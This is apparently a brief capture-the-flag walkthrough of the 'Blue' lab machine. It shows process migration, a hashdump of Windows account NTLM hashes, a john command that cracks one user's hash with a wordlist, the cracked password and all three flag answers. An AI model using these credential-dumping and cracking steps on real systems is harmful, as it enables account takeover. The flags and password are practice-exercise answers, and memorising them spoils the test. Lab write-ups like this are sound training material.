This page looks best with JavaScript enabled

Blue

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

Scans

nmap

ps
migrate 624

migrated

  • We can now get the user hashes, names with hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

hashdump

Crack the hash of Jon

Just save it locally and use john to crack it

echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > jon.hash
john --format=NT --wordlist=/home/matesz/tools/wordlists/rockyou.txt jon.hash

Got alqfna22

Search for flags

  • flag1 is in /flag1.txt
    flag{access_the_machine}
  • flag2 is in /Windows/System32/config/flag2.txt
    flag{sam_database_elevated_access}
  • flag3 is in /Users/Jon/Documents
    flag{admin_documents_can_be_valuable}

Got 3v3ry7h1ng

done

Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z